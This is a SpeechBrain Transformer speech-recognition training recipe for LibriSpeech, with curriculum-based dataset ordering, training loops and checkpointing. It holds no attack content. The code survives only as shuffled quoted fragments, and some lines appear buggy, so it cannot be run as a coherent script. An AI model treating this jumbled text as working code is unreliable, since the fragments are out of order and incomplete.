valid_loader_kwargs : dict Kwargs passed to `make_dataloader()` for", "possible variations. Authors * <NAME> 2020 * <NAME> 2020 * <NAME> 2020 *", "on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key,", "\"Ordering Type must be one of random, sorted, weighted_sorted.\" ) # order batchwise", "self._random_shuffle_data_ids(data_ids) weights = {} for index,id in enumerate(shuffled_ids): weights[id] = index return weights", "info can be , input_length, output_length, alphabetic dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type = \"sorted\"", "``fit_batch()`` * ``evaluate_batch()`` * ``update_average()`` If the initialization was done with distributed_count >", "def check_and_reset_optimizer(self): \"\"\"reset the optimizer if training enters stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current", "two data points based on input length\"\"\" duration1 = float(self.data[key1][\"duration\"]) duration2 = float(self.data[key2][\"duration\"])", "loss_ctc, loss_seq = self.fit_batch(batch) self.avg_train_loss = self.update_average( loss, self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss) # Write", ") # create Dataloader using the weights filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights, min_weight, max_weight,", "HuggingFace (or elsewhere depending on # # the path given in the YAML", "batchwise if batch_selection == \"contiguous\": pass elif batch_selection == \"random\": weights = self._random_shuffled_batches(weights,", "the default hyperparameters, the system employs a convolutional frontend and a transformer. The", "targets.\"\"\" (p_ctc, p_seq, wav_lens, hyps,) = predictions ids = batch.id tokens_eos, tokens_eos_lens =", "torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0 ) tokens = torch.cat([tokens, tokens], dim=0) tokens_lens = torch.cat([tokens_lens,", "combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if the data example fulfills the filtering criteria\"\"\"", "data points as equal, continue # comparing using the next key, else return", "a certain behavior: * ``fit_batch()`` * ``evaluate_batch()`` * ``update_average()`` If the initialization was", "): self.step += 1 loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss", "on a Transformer decoder. Beamsearch coupled with a Transformer language model is used", "0: # for the sake of efficiency, we only perform beamsearch with limited", "test_clean, test_other etc asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k],", "pretrained LM from HuggingFace (or elsewhere depending on # # the path given", "\"\"\"Gets called at the end of a epoch. This is used to handle", "in input\"\"\" # check if we need to switch optimizer # if so", "is not None and not ( isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader) ): valid_set", ": None, dict Map from data_id to weight, these weight(s) will be used", "in sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in", "batch_selection=batch_selection, batch_size=batch_size ) # when sorting do not shuffle in dataloader ! otherwise", "this, so they have the same dynamic items available) \"\"\" # ordering type", "if current_epoch % valid_search_interval == 0 or ( stage == sb.Stage.TEST ): #", "self.hparams.ordering self.batch_selection = self.hparams.batch_selection self.sortagrad = sortagrad # create tensorboard summary writer self.tensorboard_writer", "reshuffled at the end of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1:", "0.0 self.step = 0 # Validation stage if valid_set is not None: self.on_stage_start(Stage.VALID,", "This behavior can be changed by overriding the ``configure_optimizers()`` method. hparams : dict", "self.checkpointer is not None and self.ckpt_interval_minutes > 0 and time.time() - last_ckpt_time >=", "def _random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids)", "_, _ = self.compute_objectives(predictions, batch, stage=stage) return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets", "string key and a hyperparameter that is used within the overridden methods. These", "distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str) The location for", "done. For more complicated use cases, such as multiple modules that need to", ", loss_ctc, loss_seq def fit_batch(self, batch): \"\"\"Train the parameters given a single batch", "torch.optim class A torch optimizer constructor that has takes only the list of", "stop if loss is not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() # anneal lr every", "Load latest checkpoint to resume training if interrupted if self.checkpointer is not None:", "training. If a Dataset is given, a DataLoader is automatically created. If a", "# forward modules src = self.modules.CNN(feats) enc_out, pred = self.modules.Transformer( src, tokens_bos, wav_lens,", ": dict Kwargs passed to `make_dataloader()` for making the valid_loader (if valid_set is", "pipeline through user-defined functions.\"\"\" data_folder = hparams[\"data_folder\"] # train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"],", "* 0 - key1 = key2 \"\"\" for ordering in dataset_orderings: key =", "= self.data[data_id] data_point[\"id\"] = data_id computed = self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value, key_max_value, key_test):", "in enumerate(sorted_data_ids): weights[id] = index return weights def _input_length_comparator( self, key1, key2 ):", "\"Ordering Type must be one of random, sorted, weighted_sorted.\" ) # create Dataloader", "at the beginning of the ``fit()`` method. This behavior can be changed by", "Default ``2``. debug_epochs (int) Number of epochs to run in debug mode, Default", "ordering_info : str Information to create weights based on pre-defined keys( and/or methods)", "such as multiple modules that need to be updated, the following methods can", "self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function prepares the datasets to be used in the", "speechbrain.core import Stage import time def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): #", "only methods that need to be overridden are: * ``compute_forward()`` * ``compute_objectives()`` The", "that can (or should) be overridden. The following methods are used and expected", "Librispeech) from librispeech_prepare import prepare_librispeech # noqa # Create experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"],", "None, int If not None, only keep (at most) the first n filtered", "random, ascending or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, )", "sb.Stage.TEST: hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq, wav_lens, hyps def compute_objectives(self,", "hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data)", "Number of epochs to run in debug mode, Default ``2``. If a non-positive", "= self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called at", "of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1: # number of epochs", "Path import speechbrain as sb from hyperpyyaml import load_hyperpyyaml from speechbrain.utils.distributed import run_on_main", "Compute/store important stats stage_stats = {\"loss\": stage_loss} if stage == sb.Stage.TRAIN: self.train_stats =", "variations. Authors * <NAME> 2020 * <NAME> 2020 * <NAME> 2020 * <NAME>", "joint) beamsearch coupled with a neural language model. To run this recipe, do", "for utt_seq in hyps ] target_words = [wrd.split(\" \") for wrd in batch.wrd]", "distributed_launch=True then # create ddp_group with the right communication protocol sb.utils.distributed.ddp_init_group(run_opts) # 1.", "_input_length_comparator( self, key1, key2 ): \"\"\"Compare two data points based on input length\"\"\"", "`desc` - Example: * \"input_length:asc,output_length:desc\" - Sort the dataset using ``input_length`` in ascending", "# initial=0, # dynamic_ncols=True, # disable=False, # ) as t: # cnt =", "and time.time() - last_ckpt_time >= self.ckpt_interval_minutes * 60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time = time.time()", "60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time = time.time() # Run train \"on_stage_end\" on all processes", "# # We download the pretrained LM from HuggingFace (or elsewhere depending on", "self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], ) # Debug mode only", "`reverse-sorted` - Example: * \"random\" - After dataset is ordered based on `ordering_info`,", "ensure code runs without crashing. debug_batches (int) Number of batches to run in", "of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str) The location for performing computations. auto_mix_prec", "self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched = True def on_fit_start(self):", "self.optimizer.step() self.optimizer.zero_grad() # anneal lr every update self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(), loss_seq.detach()", "hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"random\": # pass # else: #", "the data processing pipeline through user-defined functions.\"\"\" data_folder = hparams[\"data_folder\"] # train_data =", "\"random\": weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if weights == None: #", "if training is interrupted right before stage 2 group = current_optimizer.param_groups[0] if \"momentum\"", "of each epoch\"\"\" if stage != sb.Stage.TRAIN: self.acc_metric = self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer()", "output layer for seq2seq log-probabilities pred = self.modules.seq_lin(pred) p_seq = self.hparams.log_softmax(pred) # Compute", "_ = self.compute_objectives(predictions, batch, stage=stage) return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets called", "curriculum learning for ``n`` number of epochs By default, it is ``-1``. \"\"\"", "This is used to handle , whether the dataset needs to be reshuffled", "self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) # Only run validation \"on_stage_end\" on main", "using preferred cl approach return else: if self.sortagrad != -1: # number of", "# \"sorting must be random, ascending or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv(", "is separate test_datasets = {} for csv_file in hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name]", "key_test : dict Map from key (in data or in dynamic items) to", "= self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {} for index,id in enumerate(sorted_data_ids): weights[id]", "systems. By properly changing the parameter files, you can try different encoders, decoders,", "key_min_value={}, key_max_value={}, key_test={}, min_weight=None, max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None, ): \"\"\"Get a", "resumed from stage two, reinitialize the optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer = self.optimizer", "self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at", "If not None, will only keep data_point if weight[data_point] < max_weight weights :", "data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets = [train_data, valid_data] + [i", "hparams[\"sorting\"] == \"random\": # pass # else: # raise NotImplementedError( # \"sorting must", "min_key=None): \"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key )", "= self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs, wavs_noise], dim=0) wav_lens = torch.cat([wav_lens, wav_lens]) tokens_bos", "Only run validation \"on_stage_end\" on main process self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID,", "False sortagrad: int Number of epochs, for which curriculum based dataset be used.", "== sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as w:", "data_point if data_point[key] <= limit key_test : dict Map from key (in data", "tokens_lens) loss = ( self.hparams.ctc_weight * loss_ctc + (1 - self.hparams.ctc_weight) * loss_seq", "if current_epoch % self.hparams.valid_search_interval == 0: # for the sake of efficiency, we", "if we need to switch optimizer # if so change the optimizer from", "the pretrained LM from HuggingFace (or elsewhere depending on # # the path", "self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w) #", "= self.compute_objectives(predictions, batch, stage=stage) return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets called at", "if isinstance(self.optimizer, torch.optim.SGD): self.switched = True if self.switched is True: return if current_epoch", "run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin: hparams = load_hyperpyyaml(fin, overrides) #", "sub-word units estimated with Byte Pairwise Encoding (BPE) are used as basic recognition", "to run on. distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str)", "*= order # If comparison using `key` returned data points as equal, continue", "requested and main_process enable = progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1)", "given predictions and targets.\"\"\" (p_ctc, p_seq, wav_lens, hyps,) = predictions ids = batch.id", "and only saving a checkpoint on the main process. Arguments --------- epoch_counter :", "select_n ) return FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def _filter_dataset( self, data_ids, key_min_value={}, key_max_value={},", "of data to use for validation. If a Dataset is given, a DataLoader", "Training stage self.on_stage_start(Stage.TRAIN, epoch) self.modules.train() # Reset nonfinite count to 0 each epoch", "# If comparison using `key` returned data points as equal, continue # comparing", "= self._random_shuffled_batches(weights, batch_size) elif batch_selection == \"sorted\": pass elif batch_selection == \"reverse-sorted\": weights", "t: self.step += 1 global_step = completed_steps + self.step loss, loss_ctc, loss_seq =", "is used. Activate it only with cuda. max_grad_norm (float) Default implementation of ``fit_batch()``", "computations from the waveform batches to the output probabilities.\"\"\" batch = batch.to(self.device) wavs,", "the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain = ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"],", "batch, stage): \"\"\"Forward computations from the waveform batches to the output probabilities.\"\"\" batch", "use cases, such as multiple modules that need to be updated, the following", "an integer indicating the epoch count. train_set : Dataset, DataLoader A set of", "weights[data_id] = index return weights def _custom_sorted_weights( self, data_ids, dataset_orderings ): \"\"\"Create `weights`", "self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq, wav_lens, hyps def compute_objectives(self, predictions, batch, stage): \"\"\"Computes", "of time between saving intra-epoch checkpoints, in minutes, default: ``15.0``. If non-positive, these", "key:value pair should consist of a string key and a hyperparameter that is", "List of keys in ``modules`` that should be jit compiled. distributed_count (int) Number", "order.strip() == '': continue column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def _random_shuffle_data_ids( self,", "between saving intra-epoch checkpoints, in minutes, default: ``15.0``. If non-positive, these are not", "wav_lens = torch.cat([wav_lens, wav_lens]) tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0) # compute features feats", "loops. The primary purpose of the `Brain` class is the implementation of the", "the ``fit()`` method, which iterates epochs and datasets for the purpose of \"fitting\"", "% self.hparams.valid_search_interval == 0: # for the sake of efficiency, we only perform", "opt_class=None, hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer", "time.time() - last_ckpt_time >= self.ckpt_interval_minutes * 60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time = time.time() #", "an encoder, a decoder, and an attention mechanism between them. Decoding is performed", "count to 0 each epoch self.nonfinite_count = 0 if self.train_sampler is not None", "= self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage == sb.Stage.TRAIN: if hasattr(self.hparams, \"augmentation\"): feats =", "# check if we need to switch optimizer # if so change the", "= hparams[\"tokenizer\"] # Training asr_brain.fit( asr_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing", "keep data_point if data_point[key] <= limit key_test : dict Map from key (in", "(tokens_list)) yield tokens_bos tokens_eos = torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield tokens_eos tokens = torch.LongTensor(tokens_list)", "batch_selection == \"random\": weights = self._random_shuffled_batches(weights, batch_size) elif batch_selection == \"sorted\": pass elif", "# ordering type can be random, sorted # keys for ordering info can", "\"OOPS!! Batchwise shuffling gone wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id]", "import ReproducibleRandomSampler from tqdm.contrib import tqdm import numpy as np from functools import", "self, key_min_value={}, key_max_value={}, key_test={}, min_weight=None, max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None, ): \"\"\"Get", "list(weights.keys()) for data_id in data_ids: data_id[weights[data_id]] = data_id data_count = len(data_ids) batch_count =", "\"\"\"Shuffle the data_ids in random order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ):", "epoch: # recreate dataset using random shuffling return else: return def check_and_reset_optimizer(self): \"\"\"reset", "and a hyperparameter that is used within the overridden methods. These will be", "to use the ``fit()`` method, one should sub-class the ``Brain`` class and override", "= torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield tokens_eos tokens = torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline)", "data_points. The possible sorting is applied, but only on the first n data", "key,value in weights.items(): if (isinstance(min_value,float) and value < min_value) or \\ (isinstance(max_value,float) and", "}, ) # here we create the datasets objects as well as tokenization", "if computed[key] >= limit: continue return False for key, limit in key_max_value.items(): if", "self.hparams.SGD(self.modules.parameters()) # Load latest checkpoint to resume training if interrupted if self.checkpointer is", "self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval =", "( isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader) ): train_set = self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs", "to 0 each epoch self.nonfinite_count = 0 if self.train_sampler is not None and", "np.flipud(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index]", "These modules are passed to the optimizer by default if they have trainable", "a list of data ids, fulfilling the filtering criteria.\"\"\" def combined_filter(computed, key_min_value, key_max_value,", "and value > max_value): weights.pop(key,None) return weights filtered_weights = weights_filter(weights,min_value,max_value) filtered_ids = []", "\"\"\"Train the parameters given a single batch in input\"\"\" # check if we", "is resumed from stage two, reinitialize the optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer =", "DataLoader is given, it is used directly. valid_set : Dataset, DataLoader A set", "Dataset, not DataLoader). E.g., batch_size, num_workers. DataLoader kwargs are all valid. progressbar :", "tokens_bos tokens_eos = torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield tokens_eos tokens = torch.LongTensor(tokens_list) yield tokens", "return else: # recreate dataset using preferred cl approach return else: if self.sortagrad", "hasattr(self.modules, \"env_corrupt\") and stage == sb.Stage.TRAIN: tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0) tokens_eos_lens =", "/ self.hparams.gradient_accumulation).backward() if self.step % self.hparams.gradient_accumulation == 0: # gradient clipping & early", "be used. It can take one of three values * ``-1`` - Use", "= torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0 ) tokens = torch.cat([tokens, tokens], dim=0) tokens_lens =", "random shuffling return else: return def check_and_reset_optimizer(self): \"\"\"reset the optimizer if training enters", "self, epoch_counter, train_set, valid_set=None, progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate epochs and datasets to", "length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"]) if length1 > length2: return 1", "pathlib import Path import speechbrain as sb from hyperpyyaml import load_hyperpyyaml from speechbrain.utils.distributed", "key_test): filtered_data_ids.append(data_id) return filtered_data_ids def _weighted_filtered_sorted_ids( self, weights, min_value=None, max_value=None, select_n=None, reverse=False ):", "learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering = self.hparams.ordering self.batch_selection = self.hparams.batch_selection self.sortagrad = sortagrad", "Decode token terms to words predicted_words = [ tokenizer.decode_ids(utt_seq).split(\" \") for utt_seq in", "from librispeech_prepare import prepare_librispeech # noqa # Create experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file,", "(isinstance(max_value,float) and value > max_value): weights.pop(key,None) return weights filtered_weights = weights_filter(weights,min_value,max_value) filtered_ids =", "``True``, automatic mixed-precision is used. Activate it only with cuda. max_grad_norm (float) Default", "data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns a list of data ids, fulfilling the", "<reponame>Darshan7575/speechbrain #!/usr/bin/env python3 \"\"\"Recipe for training a Transformer ASR system with librispeech. The", "should sub-class the ``Brain`` class and override any methods for which the default", "= self.hparams.batch_selection self.sortagrad = sortagrad # create tensorboard summary writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder", "for the sake of efficiency, we only perform beamsearch with limited capacity #", "at the beginning of each epoch\"\"\" if stage != sb.Stage.TRAIN: self.acc_metric = self.hparams.acc_computer()", "used and expected to have a certain behavior: * ``fit_batch()`` * ``evaluate_batch()`` *", "has weight within the range (`min_value`, `max_value`)\"\"\" if min_value == None and max_value", "sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\") # test is separate test_datasets", "is handled specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset):", "(`min_value`, `max_value`)\"\"\" if min_value == None and max_value == None: return weights if", "for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _custom_sorted_weights( self, data_ids,", "tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) # output layer for ctc log-probabilities logits = self.modules.ctc_lin(enc_out)", "sorted, weighted_sorted.\" ) # create Dataloader using the weights filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights,", "decoder. Beamsearch coupled with a Transformer language model is used on the top", "hyperpyyaml import load_hyperpyyaml from speechbrain.utils.distributed import run_on_main from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset from", "device and only saving a checkpoint on the main process. Arguments --------- epoch_counter", "output keys and dynamic items (initially deep copied from this, so they have", "> python train.py hparams/conformer.yaml With the default hyperparameters, the system employs a convolutional", "def dataio_prepare(hparams): \"\"\"This function prepares the datasets to be used in the brain", "hasattr( self.train_sampler, \"set_epoch\" ): self.train_sampler.set_epoch(epoch) # Time since last intra-epoch checkpoint last_ckpt_time =", "len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise shuffling gone wrong.\" weights = {} for", "text_pipeline) # 4. Set output: sb.dataio.dataset.set_output_keys( datasets, [\"id\", \"sig\", \"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"],", "self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if ( current_epoch % valid_search_interval ==", "a epoch.\"\"\" # Compute/store important stats stage_stats = {\"loss\": stage_loss} if stage ==", "int Used to divide the dataset into batches. This helps in ordering the", "hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin: hparams = load_hyperpyyaml(fin, overrides)", "elif batch_selection == \"sorted\": pass elif batch_selection == \"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size)", "to encode the labels when creating # mini-batches. tokenizer = hparams[\"tokenizer\"] # 2.", "the waveform batches to the output probabilities.\"\"\" batch = batch.to(self.device) wavs, wav_lens =", "import time def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): # TRAIN stage is", "change the optimizer from Adam to SGD self.check_and_reset_optimizer() predictions = self.compute_forward(batch, sb.Stage.TRAIN) loss,", "hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain = ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], )", "objects to trainer: asr_brain.tokenizer = hparams[\"tokenizer\"] # Training asr_brain.fit( asr_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"],", "# keys are test_clean, test_other etc asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with", "efficiency, we only perform beamsearch with limited capacity # and no LM to", "< text2: return -1 else: return 0 class ASR(sb.core.Brain): r\"\"\"Brain class abstracts away", "str Information on how to order batches. - Possible Values are `contiguous`, `random`,", "ids = batch.id tokens_eos, tokens_eos_lens = batch.tokens_eos tokens, tokens_lens = batch.tokens if hasattr(self.modules,", "valid_set, stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs, ) self.on_fit_start() self.train_set = train_set total_steps = len(train_set) if", "min_value=None, max_value=None, select_n=None, reverse=False ): \"\"\"Returns a list of data ids, filtered and", "epoch in epoch_counter: # Training stage self.on_stage_start(Stage.TRAIN, epoch) self.modules.train() # Reset nonfinite count", "and an attention mechanism between them. Decoding is performed with (CTC/Att joint) beamsearch", "using the next key, else return the result if res == 0: continue", "The tokenizer is loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization", "self._alphabetic_comparator(key1,key2) res *= order # If comparison using `key` returned data points as", "train_data.filtered_sorted( # sort_key=\"duration\", reverse=True # ) # # when sorting do not shuffle", "with cuda. max_grad_norm (float) Default implementation of ``fit_batch()`` uses ``clip_grad_norm_`` with this value.", "the details of data loops. The primary purpose of the `Brain` class is", "# Trainer initialization asr_brain = ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], ) #", "# train_set = make_dataloader( # valid_data , # stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"]", "make_dataloader( # valid_data , # stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # ) #", "= {\"loss\": stage_loss} if stage == sb.Stage.TRAIN: self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"]", "self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss) # Write training summary to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\",", "subsets for each device and only saving a checkpoint on the main process.", "important stats stage_stats = {\"loss\": stage_loss} if stage == sb.Stage.TRAIN: self.train_stats = stage_stats", "# ) as t: # cnt = 0 # for batch in t:", ") with open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w) # save the averaged checkpoint at", "make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): # TRAIN stage is handled specially. dataloader", "self, key1, key2 ): \"\"\"Compare two data points based on alphabetic order\"\"\" text1", "self.check_and_reset_optimizer() predictions = self.compute_forward(batch, sb.Stage.TRAIN) loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN) #", "2 group = current_optimizer.param_groups[0] if \"momentum\" not in group: return self.checkpointer.recover_if_possible( device=torch.device(self.device) )", "a list of data ids, filtered and sorted using custom weights\"\"\" def weights_filter(weights,min_value,max_value):", ") self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function prepares the datasets to be", "when sorting do not shuffle in dataloader ! otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"]", "the brain class. It also defines the data processing pipeline through user-defined functions.\"\"\"", "# save the averaged checkpoint at the end of the evaluation stage #", "tokens, wav_lens, tokens_lens) loss = ( self.hparams.ctc_weight * loss_ctc + (1 - self.hparams.ctc_weight)", "Each call should return an integer indicating the epoch count. train_set : Dataset,", "select_n=None, ): \"\"\"Get a filtered and/or sorted version of this based on specified", "test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data) # train_set = make_dataloader( # valid_data , #", "key_min_value.items(): if computed[key] >= limit: continue return False for key, limit in key_max_value.items():", "* <NAME> 2020 * <NAME> 2020 * <NAME> 2020 * <NAME> 2020 *", "= sortagrad # create tensorboard summary writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + \"/tensorboard\") def", "logic, like splitting the training data into subsets for each device and only", "completed_steps = (epoch - 1) * total_steps with tqdm( self.train_set, initial=self.step, dynamic_ncols=True, disable=not", "ckpts, recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function prepares the", "= torch.cat([wavs, wavs_noise], dim=0) wav_lens = torch.cat([wav_lens, wav_lens]) tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)", "csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets = [train_data, valid_data]", "def _weighted_filtered_sorted_ids( self, weights, min_value=None, max_value=None, select_n=None, reverse=False ): \"\"\"Returns a list of", "not None and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2] for", "global_step) # Debug mode only runs a few batches if self.debug and self.step", "as np from functools import cmp_to_key from torch.utils.data 